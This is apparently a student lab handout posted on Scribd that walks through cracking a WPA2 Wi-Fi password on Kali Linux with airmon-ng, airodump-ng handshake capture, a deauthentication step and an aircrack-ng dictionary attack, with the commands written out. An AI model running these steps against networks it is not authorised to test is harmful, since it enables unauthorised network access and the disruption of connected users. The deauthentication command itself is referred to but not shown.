0% found this document useful (0 votes)
20 views

Lab 5

This document provides instructions for cracking WPA2 passwords using a Wi-Fi adapter in Kali Linux. It describes running commands to check for interfering processes, putting the adapter in monitor mode, capturing access point details and connected devices, running a deauthentication attack to capture handshakes, downloading a password dictionary, and using the captured files and dictionary to crack the password with aircrack-ng if it is in the list.

Uploaded by

mateokruti14
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
20 views

Lab 5

This document provides instructions for cracking WPA2 passwords using a Wi-Fi adapter in Kali Linux. It describes running commands to check for interfering processes, putting the adapter in monitor mode, capturing access point details and connected devices, running a deauthentication attack to capture handshakes, downloading a password dictionary, and using the captured files and dictionary to crack the password with aircrack-ng if it is in the list.

Uploaded by

mateokruti14
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 5

WPA2 CRACK WITH DEAUTHENTICATION - BRUTEFORCE

Connect to your wifi adapter and verify that your wifi adpter has been connected in Kali
Linux.

Before enabling monitor mode on the card, it's crucial to terminate any processes that
might disrupt the wireless LAN. You can do this by running the command 'sudo airmon-ng
check kill.' These interfering processes can cause issues like channel changes and even
revert the interface back to managed mode.

Afterwards, switch your Wi-Fi adapter's mode from managed to monitor mode. Confirm this
mode change by using the 'iwconfig' command to check and ensure that the adapter is
indeed in monitor mode.
This command is employed to capture raw 802.11 frames, which, in turn, assists in
identifying the Access Point details within the effective range of the Wi-Fi card.
sudo airodump-ng wlan0mon

By executing the following command, you can discover the MAC address of the Access
Point, its channel, and its ESSID, which is the network name you intend to target. This
command will also display the devices currently connected to that specific Access Point
within the designated channel:
sudo airodump-ng --bssid 9C:53:22:AF:73:7C --channel 2 -w WPA2CRACKDEMO wlan0mon
In a new terminal, while keeping the previous command running in the original terminal,
execute the following command. This new command employs the deauthentication method
to capture the WPA handshake.
To do brute force attack, first need to download the below password dictionary. So, Here
you haverun below command to get it.
wget https://svn.nmap.org/nmap/nselib/data/passwords.lst

To wrap up, you'll attempt to crack the password using the pcap file created by airodump-
ng. By utilizing both the pcap file and a list of potential passwords, you can crack the access
point's password if it happens to be included in the dictionary.
sudo aircrack-ng -b 9C:53:22:AF:73:7C WPA2CRACKDEMO-01.cap -w passwords.lst
sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart
run above command to bring back your Network services running back in to normal
mode.Then connect to the particular access point with the password you have find.

You might also like